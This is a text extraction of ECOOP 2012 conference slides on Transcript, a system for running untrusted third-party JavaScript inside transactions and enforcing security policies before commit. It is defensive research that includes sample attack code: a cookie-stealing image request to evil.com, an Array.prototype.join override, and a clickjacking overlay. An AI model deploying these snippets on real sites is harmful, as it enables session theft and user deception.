Download - Enhancing JavaScript with Transactions
Enhancing JavaScriptwith Transactions
Mohan Dhawan†, Chung-chieh Shan‡
and Vinod Ganapathy†
†Department of Computer Science, Rutgers University‡School of Informatics and Computing, Indiana University
April 21, 2023 ECOOP 2012 1
Problem Web applications include third party content
Examples: widgets, advertisements, libraries May contain untrusted, malicious JavaScript
April 21, 2023 ECOOP 2012 2
Example from nytimes.com Rogue third party advertisement
Displayed image of fake virus scan
Client security and privacy at risk
April 21, 2023 ECOOP 2012 3
Solution: Transcript
Extend JavaScript to support Transactions Execute untrusted content speculatively
Commit changes after policy enforcement
Transaction
Web Application
April 21, 2023 ECOOP 2012 4
Goal Protect the Web application from security
violating actions of untrusted JavaScript Must handle arbitrary third party code written in
JavaScript Including constructs such as eval, this, with.
Must enforce powerful security policies Allow pop-ups from white-listed websites only. Dis-allow innerHTML in the context of host Web
application.
April 21, 2023 ECOOP 2012 5
Contributions JavaScript transactions
Speculative execution of unmodified third party JavaScript code
Transaction suspend/resume Allow host Web application to mediate external
actions like DOM and AJAX operations
Speculative DOM updates
April 21, 2023 ECOOP 2012 6
Schematic use of Transcript
// Web application codevar tx = transaction{
...// unmodified 3rd party code
... };// Introspection block goes below/* policy enforcement code */// validate actions of the transactiontx.commit();//Rest of the Web application code
Transaction
WebApplication
April 21, 2023 ECOOP 2012 7
Example: Untrusted code// Web application code
var tx = transaction{
var image =
document.createElement("img");
var url =
"http://evil.com/grabcookie.php";
var params = document.cookie;
image.src = url + "?cookie=" + params;
document.body.appendChild(image);
...
Array.prototype.join = function() {
return "evilString"; };
};
Transaction
WebApplication
April 21, 2023 ECOOP 2012 8
April 21, 2023 9
tx = transaction {...
body.appendChild(image);...
};
do {
...
tx = tx.resume();
...
} while(tx.isSuspended());
tx.commit();
Web application code…
…Rest of the Web application
2
3
4
5
6
Transcript runtime system
Introspection block
Transcript Runtime
1
DOMTX
R/W setscall stack3rd party
Transaction object tx
web app……
13
web appTranscript clones the host’s DOM when the transaction starts.
DOMorig DOMTX
Clone
1
web app
call stack3rd-party
……
12
web app
On a transaction suspend, the Transcript runtime saves all the i) read write sets ,ii) speculative DOM , andiii) stack frames till the nearest transaction delimiter to create a Transaction object
…
call stack3rd party
5DOMTX
R/W setscall stack3rd party
Transaction object tx
web app*
Transcript runtime loads the savedread write sets and stack frames when the transaction resumes.
resume
…
4
web app*
image
+
DOMTX
DOM’TX
appendChild
tx’s writeset + Heaporig Heapnew
DOM’TX DOMnew
In the introspection block, the host performs the action (appendChild) on behalf of the guest.
April 21, 2023 ECOOP 2012 9
Transaction suspend and resume
TransactionWeb
Application
var tx = transaction{
...
document.body.appendChild(image);
};
do{
var rs = tx.getReadSet(), arg = tx.getArgs();
switch(tx.getCause()) {
case "appendChild":
if (arg[0].nodeName.match("IMG") &&
!rs.checkMembership(document,"cookie"))
obj.appendChild(arg[0]);
break; }; /* end switch */
tx = tx.resume();
}while(tx.isSuspended());
if (!(arg[0].nodeName.match("IMG") &&
rs.checkMembership(document,"cookie"))
obj.appendChild(arg[0]);
Policy
April 21, 2023 ECOOP 2012 10
Read and Write Setsvar tx = transaction{ ... Array.prototype.join = function() {
return "evilString"; };};/* Introspection Code */var ws = tx.getWriteSet();if(ws.checkMembership(Array.prototype, "*"){
to_commit = false;}
// Rest of the web application code
TransactionWebApplication
var ws = tx.getWriteSet();
if(ws.checkMembership(Array.prototype, "*")){
to_commit = false;
}
Policy
April 21, 2023 ECOOP 2012 11
Gluingvar tx = transaction{ ... document.write(‘<script src=
“newcode.js”></s’ + ‘cript>’);};
// Introspection block
// Rest of the web application code
TransactionWebApplication
April 21, 2023 ECOOP 2012 12
Implementation Prototype implementation in Firefox 3.7a4 Added new JavaScript features
transaction keyword and Transaction object Modified SpiderMonkey op-codes to
Log all object accesses Suspend on DOM / AJAX calls
Added speculative execution support for DOM operations Re-direct all node accesses to the cloned copy
April 21, 2023 ECOOP 2012 13
Evaluation Goals
Study applicability of Transcript in isolating real guest code
Measure performance impact on guest code and micro-benchmarks
Demonstrate graceful recovery in presence of malicious and buggy guests
Methodology Isolated the guest code in a Web application using
transactions Introspection block for each transaction enforced a
number of general and domain specific policies
April 21, 2023 14April 21, 2023 ECOOP 2012 14
Applicability of Transcript Applied Transcript on five JavaScript widgets and
applications Stand-alone and library based
No difference in behavior and functionality
April 21, 2023 15
Benchmarks PoliciesJS Menu No network or cookie access
Picture Puzzle Disallow attaching key event handlers
Spell Checker No XMLHttpRequest if cookies were read
GreyBox iframes to whitelisted URLs only
Color Picker No innerHTML in host’s context
April 21, 2023 ECOOP 2012 15
Performance - Application benchmarks
April 21, 2023 16
Overhead = 0.16s
April 21, 2023 ECOOP 2012 16
Performance – Microbenchmarks (Function calls)
April 21, 2023 17
MicroBenchmark OverheadNative Functions
eval(“if (true) true; false;”) 6.87x
fn.call(this, i) 1.89x
External Operations
getElementById(“checkbox”) 6.78x
createElement(“div”) 3.69x
addEventListener(“click”, clk, false) 26.51x
dispatchEvent(evt) 1.20x
document.write(“<script>x = 1;</script>”) 2.01x
document.write(“<b> Hi </b>”) 1.26x
April 21, 2023 ECOOP 2012 17
Performance – Microbenchmarks (JavaScript Events)
April 21, 2023 18
Average overhead of just 94μs per event.
Event name OverheadNormalized Raw
delay(µs)
Drag event (drag) 1.71x 97
Keyboard event (keypress) 1.16x 150
Message event (message) 1.17x 85
Mouse event (click) 1.54x 86
Mouse event (mouseover) 2.05x 88
Mutation event (DOMAttrModified)
2.14x 88
UI Event (overflow) 1.97x 61
April 21, 2023 ECOOP 2012 18
Recovery Clickjacking
April 21, 2023 19
document.write(`<div style="z-index:-1; ...other size/loc params"> <a href="http://www.amazon.com"> Goto Amazon </a> </div>');...document.write(`<div style="opacity: 0.0; z-index:0; ...same size/loc params"> <a href="http://evil.com"> Goto Amazon </a> </div>');
April 21, 2023 ECOOP 2012 19
Related Work Staged information flow in JavaScript: PLDI'09
hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code
Conscript: S&P'10 aspect-oriented framework to specify and enforce fine-
grained security policies for Web applications
AdJail: Security'10 isolation mechanism to protect Web application content
from malicious advertisements
Caja, FBJS, AdSafe, etc.
April 21, 2023 ECOOP 2012 20
Conclusion
Transcript implements JavaScript transactions to provide isolation and recovery Suspend operations that break isolation
Resume operation if web application allows
Enforcement of powerful security policies All data reads / writes are recorded Ability to inspect reads / writes before commit
No restriction or changes to third party codeApril 21, 2023 ECOOP 2012 21
Questions ?
April 21, 2023 ECOOP 2012 22
Event handler wrapper generation
April 21, 2023 ECOOP 2012 23
var tx = transaction{ ... node.addEventListener(“click”,
handler, false);};// Introspection block
tx_handler = function(evt) { evt_tx = transaction { handler(evt); } iblock_func(evt_tx);}
evt_tx = transaction { handler(evt); }
var tx = transaction{ ... node.addEventListener(“click”,
tx_handler, false);};// Introspection block
A complete example
April 21, 2023 24
<script src="jsMenu.js" func="menu"></script><script>(function () {
var to_commit = true, e = eval; // indirect evalvar tx = transaction{
e(getFunctionBody(menu)); };do {
... <application-specific-policies> ...tx = tx.resume();
} while(tx.isSuspended());if(to_commit) tx.commit();
)();</script>
April 21, 2023 ECOOP 2012 24